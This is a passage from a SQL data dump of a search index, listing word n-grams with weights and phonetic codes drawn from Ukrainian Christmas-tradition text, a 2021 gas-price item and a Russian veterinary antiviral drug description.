життялюдини',0,1,1.5667,'у000',1,'*'),(1629766,'узвар життялюдини дароване','узвар життялюдини дароване',0,1,1.8667,'у000',1,'*'),(1629767,'уособлює','уособлює',0,0,0.5333,'у000',1,'*'),(1629768,'уособлює мир','уособлює мир',0,1,1.4,'у000',1,'*'),(1629769,'уособлює мир риба','уособлює мир риба',0,1,1.5667,'у000',1,'*'),(1629770,'усопших','усопших',0,0,0.4667,'у000',1,'*'),(1629771,'усопших не','усопших не',0,1,1.3333,'у000',1,'*'),(1629772,'усопших не прибирають','усопших не прибирають',0,1,1.7,'у000',1,'*'),(1629773,'хліба','хліба',0,0,0.3333,'х000',1,'*'),(1629774,'хліба інколи','хліба інколи',0,1,1.4,'х000',1,'*'),(1629775,'хліба інколи домашньої','хліба інколи домашньої',0,1,1.7333,'х000',1,'*'),(1629776,'христа','христа',0,0,0.4,'х000',1,'*'),(1629777,'христа божественна','христа божественна',0,1,1.6,'х000',1,'*'),(1629778,'христа божественна шапка','христа божественна шапка',0,1,1.8,'х000',1,'*'),(1629779,'христа мед','христа мед',0,1,1.3333,'х000',1,'*'),(1629780,'христа мед символ','христа мед символ',0,1,1.5667,'х000',1,'*'),(1629781,'христа у','христа у',0,1,1.2667,'х000',1,'*'),(1629782,'христа у перших','христа у перших',0,1,1.5,'х000',1,'*'),(1629783,'христа-бога','христа-бога',0,0,0.7333,'х000',1,'*'),(1629784,'христа-бога борщ','христа-бога борщ',0,1,1.5333,'х000',1,'*'),(1629785,'христа-бога борщ нагадує','христа-бога борщ нагадує',0,1,1.8,'х000',1,'*'),(1629786,'християн один','християн один',0,1,1.4333,'х000',1,'*'),(1629787,'християн один із','християн один із',0,1,1.5333,'х000',1,'*'),(1629788,'християнського','християнського',0,0,0.9333,'х000',1,'*'),(1629789,'християнського життя','християнського життя',0,1,1.6667,'х000',1,'*'),(1629790,'християнського життя у','християнського життя у',0,1,1.7333,'х000',1,'*'),(1629791,'христос','христос',0,0,0.4667,'х000',1,'*'),(1629792,'христос спаситель','христос спаситель',0,1,1.5667,'х000',1,'*'),(1629793,'христос спаситель син','христос спаситель син',0,1,1.7,'х000',1,'*'),(1629794,'церкві','церкві',0,0,0.4,'ц000',1,'*'),(1629795,'церкві символ','церкві символ',0,1,1.4333,'ц000',1,'*'),(1629796,'церкві символ єдності','церкві символ єдності',0,1,1.7,'ц000',1,'*'),(1629797,'часник','часник',0,0,0.4,'ч000',1,'*'),(1629798,'часник очищення','часник очищення',0,1,1.5,'ч000',1,'*'),(1629799,'часник очищення від','часник очищення від',0,1,1.6333,'ч000',1,'*'),(1629800,'чистоти','чистоти',0,0,0.4667,'ч000',1,'*'),(1629801,'чистоти надії','чистоти надії',0,1,1.4333,'ч000',1,'*'),(1629802,'чистоти надії оптимізму','чистоти надії оптимізму',0,1,1.7667,'ч000',1,'*'),(1629803,'чотири кутки','чотири кутки',0,1,1.4,'ч000',1,'*'),(1629804,'чотири кутки столу','чотири кутки столу',0,1,1.6,'ч000',1,'*'),(1629805,'шапка','шапка',0,0,0.3333,'ш000',1,'*'),(1629806,'шапка і','шапка і',0,1,1.2333,'ш000',1,'*'),(1629807,'шапка і земна','шапка і земна',0,1,1.4333,'ш000',1,'*'),(1629808,'щастя','щастя',0,0,0.3333,'щ000',1,'*'),(1629809,'щастя здоров\'я','щастя здоров',0,1,1.4667,'щ000',1,'*'),(1629810,'щастя здоров\'я як','щастя здоров як',0,1,1.5667,'щ000',1,'*'),(1629811,'що повинно','що повинно',0,1,1.3333,'щ000',1,'*'),(1629812,'що повинно бути','що повинно бути',0,1,1.5,'щ000',1,'*'),(1629813,'щоб зуби','щоб зуби',0,1,1.2667,'щ000',1,'*'),(1629814,'щоб зуби не','щоб зуби не',0,1,1.3667,'щ000',1,'*'),(1629815,'як і','як і',0,1,1.1333,'я000',1,'*'),(1629816,'як і вареники','як і вареники',0,1,1.4333,'я000',1,'*'),(1629817,'який додають','який додають',0,1,1.4,'я000',1,'*'),(1629818,'який додають до','який додають до',0,1,1.5,'я000',1,'*'),(1629819,'який уособлює','який уособлює',0,1,1.4333,'я000',1,'*'),(1629820,'який уособлює мир','який уособлює мир',0,1,1.5667,'я000',1,'*'),(1629859,'2497','2497',0,0,0.4,'',1,'*'),(1629860,'malin naperedodni','malin naperedodni',0,1,1.5667,'M451635',1,'*'),(1629861,'malin naperedodni rizdva','malin naperedodni rizdva',0,1,1.8,'M4516356231',1,'*'),(1629862,'naperedodni','naperedodni',0,0,0.7333,'N1635',1,'*'),(1629863,'naperedodni rizdva','naperedodni rizdva',0,1,1.6,'N16356231',1,'*'),(1629864,'rizdva','rizdva',0,0,0.4,'R231',1,'*'),(1629865,'малин напередодні','малин напередодні',0,1,1.5667,'м000',1,'*'),(1629866,'малин напередодні різдва','малин напередодні різдва',0,1,1.8,'м000',1,'*'),(1629867,'напередодні','напередодні',0,0,0.7333,'н000',1,'*'),(1629868,'напередодні різдва','напередодні різдва',0,1,1.6,'н000',1,'*'),(1629869,'різдва','різдва',0,0,0.4,'р000',1,'*'),(1629937,'2021 roku','2021 roku',0,1,1.3,'R200',8,'*'),(1629938,'2021 року','2021 року',0,1,1.3,'р000',9,'*'),(1629939,'2498','2498',0,0,0.4,'',1,'*'),(1629940,'gaz','gaz',0,0,0.2,'G000',2,'*'),(1629941,'gaz v','gaz v',0,1,1.1667,'G100',1,'*'),(1629942,'gaz v sichni','gaz v sichni',0,1,1.4,'G125',1,'*'),(1629943,'na prirodnij','na prirodnij',0,1,1.4,'N16352',1,'*'),(1629944,'na prirodnij gaz','na prirodnij gaz',0,1,1.5333,'N16352',1,'*'),(1629945,'prirodnij','prirodnij',0,0,0.6,'P6352',1,'*'),(1629946,'prirodnij gaz','prirodnij gaz',0,1,1.4333,'P6352',1,'*'),(1629947,'prirodnij gaz v','prirodnij gaz v',0,1,1.5,'P63521',1,'*'),(1629948,'sichni','sichni',0,0,0.4,'S500',1,'*'),(1629949,'sichni 2021','sichni 2021',0,1,1.3667,'S500',1,'*'),(1629950,'sichni 2021 roku','sichni 2021 roku',0,1,1.5333,'S562',1,'*'),(1629951,'tsini','tsini',0,0,0.3333,'T250',1,'*'),(1629952,'tsini na','tsini na',0,1,1.2667,'T250',1,'*'),(1629953,'tsini na prirodnij','tsini na prirodnij',0,1,1.6,'T2516352',1,'*'),(1629954,'v sichni','v sichni',0,1,1.2667,'V250',1,'*'),(1629955,'v sichni 2021','v sichni 2021',0,1,1.4333,'V250',1,'*'),(1629956,'в січні','в січні',0,1,1.2333,'в000',1,'*'),(1629957,'в січні 2021','в січні 2021',0,1,1.4,'в000',1,'*'),(1629958,'газ','газ',0,0,0.2,'г000',2,'*'),(1629959,'газ в','газ в',0,1,1.1667,'г000',1,'*'),(1629960,'газ в січні','газ в січні',0,1,1.3667,'г000',1,'*'),(1629961,'даними https','даними https',0,1,1.4,'д312',1,'*'),(1629962,'даними https gazpravda','даними https gazpravda',0,1,1.7333,'д3121613',1,'*'),(1629963,'за даними https','за даними https',0,1,1.5,'з312',1,'*'),(1629964,'на природний','на природний',0,1,1.4,'н000',1,'*'),(1629965,'на природний газ','на природний газ',0,1,1.5333,'н000',1,'*'),(1629966,'природний','природний',0,0,0.6,'п000',1,'*'),(1629967,'природний газ','природний газ',0,1,1.4333,'п000',1,'*'),(1629968,'природний газ в','природний газ в',0,1,1.5,'п000',1,'*'),(1629969,'січні','січні',0,0,0.3333,'с000',1,'*'),(1629970,'січні 2021','січні 2021',0,1,1.3333,'с000',1,'*'),(1629971,'січні 2021 року','січні 2021 року',0,1,1.5,'с000',1,'*'),(1629972,'ціни','ціни',0,0,0.2667,'ц000',2,'*'),(1629973,'ціни на','ціни на',0,1,1.2333,'ц000',2,'*'),(1629974,'ціни на природний','ціни на природний',0,1,1.5667,'ц000',1,'*'),(1643103,'1 1 в','1 1 в',0,1,1.1667,'в000',1,'*'),(1643104,'1 1 с','1 1 с',0,1,1.1667,'с000',1,'*'),(1643105,'1 в','1 в',0,1,1.1,'в000',1,'*'),(1643106,'1 в 5','1 в 5',0,1,1.1667,'в000',1,'*'),(1643107,'1 в 960','1 в 960',0,1,1.2333,'в000',1,'*'),(1643108,'1 мл','1 мл',0,1,1.1333,'м000',1,'*'),(1643109,'1 мл на','1 мл на',0,1,1.2333,'м000',1,'*'),(1643110,'1 раз','1 раз',0,1,1.1667,'р000',1,'*'),(1643111,'1 раз в','1 раз в',0,1,1.2333,'р000',1,'*'),(1643112,'1 с','1 с',0,1,1.1,'с000',1,'*'),(1643113,'1 с подсолнечным','1 с подсолнечным',0,1,1.5333,'с000',1,'*'),(1643114,'1-2 мл','1-2 мл',0,1,1.2,'м000',1,'*'),(1643115,'1-2 мл м3','1-2 мл м3',0,1,1.3,'м000',1,'*'),(1643116,'1-2 мл на','1-2 мл на',0,1,1.3,'м000',1,'*'),(1643117,'1-2 раза','1-2 раза',0,1,1.2667,'р000',1,'*'),(1643118,'1-2 раза в','1-2 раза в',0,1,1.3333,'р000',1,'*'),(1643119,'10 кг массы','10 кг массы',0,1,1.3667,'к000',1,'*'),(1643120,'100 ml','100 ml',0,1,1.2,'M400',1,'*'),(1643121,'100 мл','100 мл',0,1,1.2,'м000',1,'*'),(1643122,'100 мл препарат','100 мл препарат',0,1,1.5,'м000',1,'*'),(1643123,'100 мл фармакологические','100 мл фармакологические',0,1,1.8,'м000',1,'*'),(1643124,'2 дня','2 дня',0,1,1.1667,'д000',1,'*'),(1643125,'2 дня подряд','2 дня подряд',0,1,1.4,'д000',1,'*'),(1643126,'2 раза','2 раза',0,1,1.2,'р000',1,'*'),(1643127,'2 раза в','2 раза в',0,1,1.2667,'р000',1,'*'),(1643128,'2-3 капли','2-3 капли',0,1,1.3,'к000',1,'*'),(1643129,'2-3 капли без','2-3 капли без',0,1,1.4333,'к000',1,'*'),(1643130,'2-3 раза','2-3 раза',0,1,1.2667,'р000',1,'*'),(1643131,'2-3 раза в','2-3 раза в',0,1,1.3333,'р000',1,'*'),(1643132,'2499','2499',0,0,0.4,'',1,'*'),(1643133,'3-4','3-4',0,0,0.3,'',1,'*'),(1643134,'3-4 раза','3-4 раза',0,1,1.2667,'р000',1,'*'),(1643135,'3-4 раза в','3-4 раза в',0,1,1.3333,'р000',1,'*'),(1643136,'3-х','3-х',0,0,0.2,'х000',1,'*'),(1643137,'3-х дневного','3-х дневного',0,1,1.4,'х000',1,'*'),(1643138,'3-х дневного перерыва','3-х дневного перерыва',0,1,1.7,'х000',1,'*'),(1643139,'4-5','4-5',0,0,0.3,'',1,'*'),(1643140,'4-5 дней','4-5 дней',0,1,1.2667,'д000',1,'*'),(1643141,'4-5 дней в','4-5 дней в',0,1,1.3333,'д000',1,'*'),(1643142,'4-5дней','4-5дней',0,0,0.4667,'д000',1,'*'),(1643143,'4-5дней при','4-5дней при',0,1,1.3667,'д000',1,'*'),(1643144,'4-5дней при кастрации','4-5дней при кастрации',0,1,1.7,'д000',1,'*'),(1643145,'45 мин','45 мин',0,1,1.2,'м000',1,'*'),(1643146,'45 мин кожные','45 мин кожные',0,1,1.4333,'м000',1,'*'),(1643147,'5 дней','5 дней',0,1,1.2,'д000',1,'*'),(1643148,'5 дней после','5 дней после',0,1,1.4,'д000',1,'*'),(1643149,'5 растворе','5 растворе',0,1,1.3333,'р000',1,'*'),(1643150,'5 растворе глюкозы','5 растворе глюкозы',0,1,1.6,'р000',1,'*'),(1643151,'960','960',0,0,0.3,'',1,'*'),(1643152,'960 спирте','960 спирте',0,1,1.3333,'с000',1,'*'),(1643153,'960 спирте или','960 спирте или',0,1,1.4667,'с000',1,'*'),(1643154,'lozeval','lozeval',0,0,0.4667,'L214',1,'*'),(1643155,'lozeval protivovirusnij','lozeval protivovirusnij',0,1,1.7667,'L21416316252',1,'*'),(1643156,'lozeval protivovirusnij preparat','lozeval protivovirusnij preparat',0,1,2,'L2141631625216163',1,'*'),(1643157,'ml','ml',0,0,0.1333,'M400',1,'*'),(1643158,'preparat 100','preparat 100',0,1,1.4,'P6163',1,'*'),(1643159,'preparat 100 ml','preparat 100 ml',0,1,1.5,'P616354',1,'*'),(1643160,'protivovirusnij','protivovirusnij',0,0,1,'P6316252',1,'*'),(1643161,'protivovirusnij preparat','protivovirusnij preparat',0,1,1.8,'P631625216163',1,'*'),(1643162,'protivovirusnij preparat 100','protivovirusnij preparat 100',0,1,1.9333,'P631625216163',1,'*'),(1643163,'аденовирусная','аденовирусная',0,0,0.8667,'а000',1,'*'),(1643164,'аденовирусная инфекция','аденовирусная инфекция',0,1,1.7333,'а000',1,'*'),(1643165,'аденовирусная инфекция парагрипп-3','аденовирусная инфекция парагрипп-3',0,1,2,'а000',1,'*'),(1643166,'акушерско-гинекологической','акушерско-гинекологической',0,0,1,'а000',1,'*'),(1643167,'акушерско-гинекологической практике','акушерско-гинекологической практике',0,1,2,'а000',1,'*'),(1643168,'акушерско-гинекологической практике вводится','акушерско-гинекологической практике вводится',0,1,2,'а000',1,'*'),(1643169,'аэрозольного','аэрозольного',0,0,0.8,'а000',1,'*'),(1643170,'аэрозольного применения','аэрозольного применения',0,1,1.7667,'а000',1,'*'),(1643171,'аэрозольного применения фасовка','аэрозольного применения фасовка',0,1,2,'а000',1,'*'),(1643172,'аэрозольных','аэрозольных',0,0,0.7333,'а000',1,'*'),(1643173,'аэрозольных обработок','аэрозольных обработок',0,1,1.7,'а000',1,'*'),(1643174,'аэрозольных обработок помещения','аэрозольных обработок помещения',0,1,2,'а000',1,'*'),(1643175,'бактериальные','бактериальные',0,0,0.8667,'б000',1,'*'),(1643176,'бактериальные инфекции','бактериальные инфекции',0,1,1.7333,'б000',1,'*'),(1643177,'бактериальные инфекции животных','бактериальные инфекции животных',0,1,2,'б000',1,'*'),(1643178,'бактериальных','бактериальных',0,0,0.8667,'б000',1,'*'),(1643179,'бактериальных заболеваний','бактериальных заболеваний',0,1,1.8333,'б000',1,'*'),(1643180,'бактериальных заболеваний повышает','бактериальных заболеваний повышает',0,1,2,'б000',1,'*'),(1643181,'бактериостатическими','бактериостатическими',0,0,1,'б000',1,'*'),(1643182,'бактериостатическими и','бактериостатическими и',0,1,1.7333,'б000',1,'*'),(1643183,'бактериостатическими и бактерицидными','бактериостатическими и бактерицидными',0,1,2,'б000',1,'*'),(1643184,'бактерицидными','бактерицидными',0,0,0.9333,'б000',1,'*'),(1643185,'бактерицидными свойствами','бактерицидными свойствами',0,1,1.8333,'б000',1,'*'),(1643186,'бактерицидными свойствами по','бактерицидными свойствами по',0,1,1.9333,'б000',1,'*'),(1643187,'без разведения','без разведения',0,1,1.4667,'б000',1,'*'),(1643188,'без разведения 2','без разведения 2',0,1,1.5333,'б000',1,'*'),(1643189,'без разведения при','без разведения при',0,1,1.6,'б000',1,'*'),(1643190,'болезнь','болезнь',0,0,0.4667,'б000',1,'*'),(1643191,'болезнь марека','болезнь марека',0,1,1.4667,'б000',1,'*'),(1643192,'болезнь марека инфекционный','болезнь марека инфекционный',0,1,1.9,'б000',1,'*'),(1643193,'болезнь ньюкасла','болезнь ньюкасла',0,1,1.5333,'б000',1,'*'),(1643194,'болезнь ньюкасла болезнь','болезнь ньюкасла болезнь',0,1,1.8,'б000',1,'*'),(1643195,'бронхит','бронхит',0,0,0.4667,'б000',1,'*'),(1643196,'бронхит кур','бронхит кур',0,1,1.3667,'б000',1,'*'),(1643197,'бронхит кур чума','бронхит кур чума',0,1,1.5333,'б000',1,'*'),(1643198,'в 5','в 5',0,1,1.1,'в000',1,'*'),(1643199,'в 5 растворе','в 5 растворе',0,1,1.4,'в000',1,'*'),(1643200,'в 960','в 960',0,1,1.1667,'в000',1,'*'),(1643201,'в 960 спирте','в 960 спирте',0,1,1.4,'в000',1,'*'),(1643202,'в акушерско-гинекологической','в акушерско-гинекологической',0,1,1.9333,'в000',1,'*'),(1643203,'в акушерско-гинекологической практике','в акушерско-гинекологической практике',0,1,2,'в000',1,'*'),(1643204,'в день','в день',0,1,1.2,'в000',1,'*'),(1643205,'в день 2','в день 2',0,1,1.2667,'в000',1,'*'),(1643206,'в день в','в день в',0,1,1.2667,'в000',1,'*'),(1643207,'в день до','в день до',0,1,1.3,'в000',1,'*'),(1643208,'в день применяют','в день применяют',0,1,1.5333,'в000',1,'*'),(1643209,'в дозе 1','в дозе 1',0,1,1.2667,'в000',1,'*'),(1643210,'в концентрации 1-2','в концентрации 1-2',0,1,1.6,'в000',1,'*'),(1643211,'в носовые','в носовые',0,1,1.3,'в000',1,'*'),(1643212,'в носовые ходы','в носовые ходы',0,1,1.4667,'в000',1,'*'),(1643213,'в пораженные','в пораженные',0,1,1.4,'в000',1,'*'),(1643214,'в пораженные доли','в пораженные доли',0,1,1.5667,'в000',1,'*'),(1643215,'в разведении','в разведении',0,1,1.4,'в000',1,'*'),(1643216,'в разведении 1','в разведении 1',0,1,1.4667,'в000',1,'*'),(1643217,'в рекомендуемых','в рекомендуемых',0,1,1.5,'в000',1,'*'),(1643218,'в рекомендуемых дозах','в рекомендуемых дозах',0,1,1.7,'в000',1,'*'),(1643219,'в сутки','в сутки',0,1,1.2333,'в000',1,'*'),(1643220,'в сутки задается','в сутки задается',0,1,1.5333,'в000',1,'*'),(1643221,'в сутки препарат','в сутки препарат',0,1,1.5333,'в000',1,'*'),(1643222,'в тех','в тех',0,1,1.1667,'в000',1,'*'),(1643223,'в тех же','в тех же',0,1,1.2667,'в000',1,'*'),(1643224,'в течение','в течение',0,1,1.3,'в000',1,'*'),(1643225,'в течение 4-5','в течение 4-5',0,1,1.4333,'в000',1,'*'),(1643226,'в течение 4-5дней','в течение 4-5дней',0,1,1.5667,'в000',1,'*'),(1643227,'в течение 5','в течение 5',0,1,1.3667,'в000',1,'*'),(1643228,'в уши','в уши',0,1,1.1667,'в000',1,'*'),(1643229,'в уши по','в уши по',0,1,1.2667,'в000',1,'*'),(1643230,'вводится','вводится',0,0,0.5333,'в000',1,'*'),(1643231,'вводится внутриматочно','вводится внутриматочно',0,1,1.7333,'в000',1,'*'),(1643232,'вводится внутриматочно в','вводится внутриматочно в',0,1,1.8,'в000',1,'*'),(1643233,'вирусные','вирусные',0,0,0.5333,'в000',1,'*'),(1643234,'вирусные инфекции','вирусные инфекции',0,1,1.5667,'в000',1,'*'),(1643235,'вирусные инфекции аденовирусная','вирусные инфекции аденовирусная',0,1,2,'в000',1,'*'),(1643236,'вирусных','вирусных',0,0,0.5333,'в000',1,'*'),(1643237,'вирусных и','вирусных и',0,1,1.3333,'в000',1,'*'),(1643238,'вирусных и бактериальных','вирусных и бактериальных',0,1,1.8,'в000',1,'*'),(1643239,'вирусов','вирусов',0,0,0.4667,'в000',1,'*'),(1643240,'вирусов обладает','вирусов обладает',0,1,1.5333,'в000',1,'*'),(1643241,'вирусов обладает бактериостатическими','вирусов обладает бактериостатическими',0,1,2,'в000',1,'*'),(1643242,'внутреннего','внутреннего',0,0,0.7333,'в000',1,'*'),(1643243,'внутреннего наружного','внутреннего наружного',0,1,1.7,'в000',1,'*'),(1643244,'внутреннего наружного и','внутреннего наружного и',0,1,1.7667,'в000',1,'*'),(1643245,'внутриклеточной','внутриклеточной',0,0,1,'в000',1,'*'),(1643246,'внутриклеточной репродукции','внутриклеточной репродукции',0,1,1.9,'в000',1,'*'),(1643247,'внутриклеточной репродукции вирусов','внутриклеточной репродукции вирусов',0,1,2,'в000',1,'*'),(1643248,'внутриматочно','внутриматочно',0,0,0.8667,'в000',1,'*'),(1643249,'внутриматочно в','внутриматочно в',0,1,1.5,'в000',1,'*'),(1643250,'внутриматочно в разведении','внутриматочно в разведении',0,1,1.8667,'в000',1,'*'),(1643251,'втирается','втирается',0,0,0.6,'в000',1,'*'),(1643252,'втирается в','втирается в',0,1,1.3667,'в000',1,'*'),(1643253,'втирается в пораженные','втирается в пораженные',0,1,1.7333,'в000',1,'*'),(1643254,'выздоровления','выздоровления',0,0,0.8667,'в000',1,'*'),(1643255,'выздоровления в','выздоровления в',0,1,1.5,'в000',1,'*'),(1643256,'выздоровления в течение','выздоровления в течение',0,1,1.7667,'в000',1,'*'),(1643257,'выздоровления отиты','выздоровления отиты',0,1,1.6333,'в000',1,'*'),(1643258,'выздоровления отиты препарат','выздоровления отиты препарат',0,1,1.9333,'в000',1,'*'),(1643259,'выпаивается','выпаивается',0,0,0.7333,'в000',1,'*'),(1643260,'выпаивается в','выпаивается в',0,1,1.4333,'в000',1,'*'),(1643261,'выпаивается в течение','выпаивается в течение',0,1,1.7,'в000',1,'*'),(1643262,'выявлено','выявлено',0,0,0.5333,'в000',1,'*'),(1643263,'глюкозы','глюкозы',0,0,0.4667,'г000',1,'*'),(1643264,'глюкозы смазывают','глюкозы смазывают',0,1,1.5667,'г000',1,'*'),(1643265,'глюкозы смазывают или','глюкозы смазывают или',0,1,1.7,'г000',1,'*'),(1643266,'гнойные','гнойные',0,0,0.4667,'г000',1,'*'),(1643267,'гнойные раны','гнойные раны',0,1,1.4,'г000',1,'*'),(1643268,'гнойные раны пораженные','гнойные раны пораженные',0,1,1.7667,'г000',1,'*'),(1643269,'грамотрицательной','грамотрицательной',0,0,1,'г000',1,'*'),(1643270,'грамотрицательной микрофлоре','грамотрицательной микрофлоре',0,1,1.9333,'г000',1,'*'),(1643271,'грамотрицательной микрофлоре лозеваль','грамотрицательной микрофлоре лозеваль',0,1,2,'г000',1,'*'),(1643272,'грамположительной','грамположительной',0,0,1,'г000',1,'*'),(1643273,'грамположительной и','грамположительной и',0,1,1.6333,'г000',1,'*'),(1643274,'грамположительной и грамотрицательной','грамположительной и грамотрицательной',0,1,2,'г000',1,'*'),(1643275,'гуморального','гуморального',0,0,0.8,'г000',1,'*'),(1643276,'гуморального иммунитета','гуморального иммунитета',0,1,1.7667,'г000',1,'*'),(1643277,'гуморального иммунитета усиления','гуморального иммунитета усиления',0,1,2,'г000',1,'*'),(1643278,'действие','действие',0,0,0.5333,'д000',1,'*'),(1643279,'действие за','действие за',0,1,1.3667,'д000',1,'*'),(1643280,'действие за счет','действие за счет',0,1,1.5333,'д000',1,'*'),(1643281,'действия в','действия в',0,1,1.3333,'д000',1,'*'),(1643282,'действия в рекомендуемых','действия в рекомендуемых',0,1,1.8,'д000',1,'*'),(1643283,'день 2','день 2',0,1,1.2,'д000',1,'*'),(1643284,'день 2 дня','день 2 дня',0,1,1.3333,'д000',1,'*'),(1643285,'день в','день в',0,1,1.2,'д000',1,'*'),(1643286,'день в течение','день в течение',0,1,1.4667,'д000',1,'*'),(1643287,'день до','день до',0,1,1.2333,'д000',1,'*'),(1643288,'день до полного','день до полного',0,1,1.5,'д000',1,'*'),(1643289,'день применяют','день применяют',0,1,1.4667,'д000',1,'*'),(1643290,'день применяют до','день применяют до',0,1,1.5667,'д000',1,'*'),(1643291,'день применяют наружно','день применяют наружно',0,1,1.7333,'д000',1,'*'),(1643292,'дерматит','дерматит',0,0,0.5333,'д000',1,'*'),(1643293,'дерматит экзема','дерматит экзема',0,1,1.5,'д000',1,'*'),(1643294,'дерматит экзема рожа','дерматит экзема рожа',0,1,1.6667,'д000',1,'*'),(1643295,'для аэрозольных','для аэрозольных',0,1,1.5,'д000',1,'*'),(1643296,'для аэрозольных обработок','для аэрозольных обработок',0,1,1.8333,'д000',1,'*'),(1643297,'для внутреннего','для внутреннего',0,1,1.5,'д000',1,'*'),(1643298,'для внутреннего наружного','для внутреннего наружного',0,1,1.8333,'д000',1,'*'),(1643299,'для профилактики','для профилактики',0,1,1.5333,'д000',1,'*'),(1643300,'для профилактики и','для профилактики и',0,1,1.6,'д000',1,'*'),(1643301,'дневного','дневного',0,0,0.5333,'д000',1,'*'),(1643302,'дневного перерыва','дневного перерыва',0,1,1.5667,'д000',1,'*'),(1643303,'дневного перерыва при','дневного перерыва при',0,1,1.7,'д000',1,'*'),(1643304,'дней','дней',0,0,0.2667,'д000',1,'*'),(1643305,'дней в','дней в',0,1,1.2,'д000',1,'*'),(1643306,'дней в акушерско-гинекологической','дней в акушерско-гинекологической',0,1,2,'д000',1,'*'),(1643307,'дней после','дней после',0,1,1.3333,'д000',1,'*'),(1643308,'дней после 3-х','дней после 3-х',0,1,1.4667,'д000',1,'*'),(1643309,'дней после з-х','дней после з-х',0,1,1.4667,'д000',1,'*'),(1643310,'дня подряд','дня подряд',0,1,1.3333,'д000',1,'*'),(1643311,'дня подряд с','дня подряд с',0,1,1.4,'д000',1,'*'),(1643312,'до заживления','до заживления',0,1,1.4333,'д000',1,'*'),(1643313,'до заживления раны','до заживления раны',0,1,1.6,'д000',1,'*'),(1643314,'до полного','до полного',0,1,1.3333,'д000',1,'*'),(1643315,'до полного выздоровления','до полного выздоровления',0,1,1.8,'д000',1,'*'),(1643316,'доза','доза',0,0,0.2667,'д000',1,'*'),(1643317,'доза особенности','доза особенности',0,1,1.5333,'д000',1,'*'),(1643318,'доза особенности вирусные','доза особенности вирусные',0,1,1.8333,'д000',1,'*'),(1643319,'дозах 1','дозах 1',0,1,1.2333,'д000',1,'*'),(1643320,'дозах 1 раз','дозах 1 раз',0,1,1.3667,'д000',1,'*'),(1643321,'дозах не','дозах не',0,1,1.2667,'д000',1,'*'),(1643322,'дозах не оказывает','дозах не оказывает',0,1,1.6,'д000',1,'*'),(1643323,'дозе 1','дозе 1',0,1,1.2,'д000',1,'*'),(1643324,'дозе 1 мл','дозе 1 мл',0,1,1.3,'д000',1,'*'),(1643325,'доли','доли',0,0,0.2667,'д000',1,'*'),(1643326,'доли 3-4','доли 3-4',0,1,1.2667,'д000',1,'*'),(1643327,'доли 3-4 раза','доли 3-4 раза',0,1,1.4333,'д000',1,'*'),(1643328,'же','же',0,0,0.1333,'ж000',1,'*'),(1643329,'же дозах','же дозах',0,1,1.2667,'ж000',1,'*'),(1643330,'же дозах 1','же дозах 1',0,1,1.3333,'ж000',1,'*'),(1643331,'животных','животных',0,0,0.5333,'ж000',1,'*'),(1643332,'животных и','животных и',0,1,1.3333,'ж000',1,'*'),(1643333,'животных и птиц','животных и птиц',0,1,1.5,'ж000',1,'*'),(1643334,'з-х','з-х',0,0,0.2,'з000',1,'*'),(1643335,'з-х дневного','з-х дневного',0,1,1.4,'з000',1,'*'),(1643336,'з-х дневного перерыва','з-х дневного перерыва',0,1,1.7,'з000',1,'*'),(1643337,'за счет','за счет',0,1,1.2333,'з000',1,'*'),(1643338,'за счет ингибирования','за счет ингибирования',0,1,1.7,'з000',1,'*'),(1643339,'за счет стимулирования','за счет стимулирования',0,1,1.7333,'з000',1,'*'),(1643340,'заболеваний','заболеваний',0,0,0.7333,'з000',1,'*'),(1643341,'заболеваний повышает','заболеваний повышает',0,1,1.6667,'з000',1,'*'),(1643342,'заболеваний повышает резистентность','заболеваний повышает резистентность',0,1,2,'з000',1,'*'),(1643343,'заболевания','заболевания',0,0,0.7333,'з000',1,'*'),(1643344,'заболевания дерматит','заболевания дерматит',0,1,1.6667,'з000',1,'*'),(1643345,'заболевания дерматит экзема','заболевания дерматит экзема',0,1,1.9,'з000',1,'*'),(1643346,'заболевания препарат','заболевания препарат',0,1,1.6667,'з000',1,'*'),(1643347,'заболевания препарат разводят','заболевания препарат разводят',0,1,1.9667,'з000',1,'*'),(1643348,'задается','задается',0,0,0.5333,'з000',1,'*'),(1643349,'задается в','задается в',0,1,1.3333,'з000',1,'*'),(1643350,'задается в тех','задается в тех',0,1,1.4667,'з000',1,'*'),(1643351,'задается в течение','задается в течение',0,1,1.6,'з000',1,'*'),(1643352,'задается с','задается с',0,1,1.3333,'з000',1,'*'),(1643353,'задается с кормом','задается с кормом',0,1,1.5667,'з000',1,'*'),(1643354,'заживления','заживления',0,0,0.6667,'з000',1,'*'),(1643355,'заживления раны','заживления раны',0,1,1.5,'з000',1,'*'),(1643356,'заживления раны побочные','заживления раны побочные',0,1,1.8,'з000',1,'*'),(1643357,'закапывают','закапывают',0,0,0.6667,'з000',1,'*'),(1643358,'закапывают в','закапывают в',0,1,1.4,'з000',1,'*'),(1643359,'закапывают в носовые','закапывают в носовые',0,1,1.6667,'з000',1,'*'),(1643360,'закапывают в уши','закапывают в уши',0,1,1.5333,'з000',1,'*'),(1643361,'и аэрозольного','и аэрозольного',0,1,1.4667,'и000',1,'*'),(1643362,'и аэрозольного применения','и аэрозольного применения',0,1,1.8333,'и000',1,'*'),(1643363,'и бактериальных','и бактериальных',0,1,1.5,'и000',1,'*'),(1643364,'и бактериальных заболеваний','и бактериальных заболеваний',0,1,1.9,'и000',1,'*'),(1643365,'и бактерицидными','и бактерицидными',0,1,1.5333,'и000',1,'*'),(1643366,'и бактерицидными свойствами','и бактерицидными свойствами',0,1,1.9,'и000',1,'*'),(1643367,'и грамотрицательной','и грамотрицательной',0,1,1.6333,'и000',1,'*'),(1643368,'и грамотрицательной микрофлоре','и грамотрицательной микрофлоре',0,1,2,'и000',1,'*'),(1643369,'и гуморального','и гуморального',0,1,1.4667,'и000',1,'*'),(1643370,'и гуморального иммунитета','и гуморального иммунитета',0,1,1.8333,'и000',1,'*'),(1643371,'и косметических','и косметических',0,1,1.5,'и000',1,'*'),(1643372,'и косметических операциях','и косметических операциях',0,1,1.8333,'и000',1,'*'),(1643373,'и лечения','и лечения',0,1,1.3,'и000',1,'*'),(1643374,'и лечения вирусных','и лечения вирусных',0,1,1.6,'и000',1,'*'),(1643375,'и повышения','и повышения',0,1,1.3667,'и000',1,'*'),(1643376,'и повышения уровня','и повышения уровня',0,1,1.6,'и000',1,'*'),(1643377,'и птиц','и птиц',0,1,1.2,'и000',1,'*'),(1643378,'и птиц за','и птиц за',0,1,1.3,'и000',1,'*'),(1643379,'и птиц описание','и птиц описание',0,1,1.5,'и000',1,'*'),(1643380,'и птиц паратиф','и птиц паратиф',0,1,1.4667,'и000',1,'*'),(1643381,'и состав','и 